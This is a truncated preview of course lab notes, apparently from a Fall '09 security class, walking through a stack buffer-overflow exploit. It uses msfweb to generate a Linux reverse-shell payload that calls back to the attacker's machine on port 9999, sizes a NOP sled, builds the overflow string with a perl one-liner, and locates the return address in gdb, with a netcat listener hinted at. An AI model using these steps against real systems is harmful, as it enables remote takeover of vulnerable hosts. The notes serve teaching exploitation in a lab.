This preview has intentionally blurred sections. Sign up to view the full version.View Full Document
Unformatted text preview: msfweb Step 7: Click on the buttons PAYLOADS and search for Linux Linux command shell, reverse . Find the Reverse shell for x86 architecture Step 8: Generate a new shell with the following options LPORT: 9999 LHOST: <your backtrack ip addr> Step 9: Copy the generated code and strip off the “, newlines, and spaces Step 10: Note the size of bytes of the generated shellcode. Then take 1032 - 600 - 4 - <size of shellcode> = number of NOPs you need. Step 11: Run the following command to test if you are still generating an overflow run `perl -e ʻ print “A”x600,”\x90”x<#nops>,”<shellcode>”,”BBBB” ʼ ` Step 12: You should see the EIP failed at \x42\x42\x42\x42. You need to find a NOP location to start executing your code. (gdb) x/2000xb $esp Step 13: Reverse the code address. i.e AABBCCDD \xDD\xCC\xBB\xAA and replace the previous BBBB code with the code location....
View Full Document
- Fall '09
- following command, command nc –l, Linux command shell, backtrack ip addr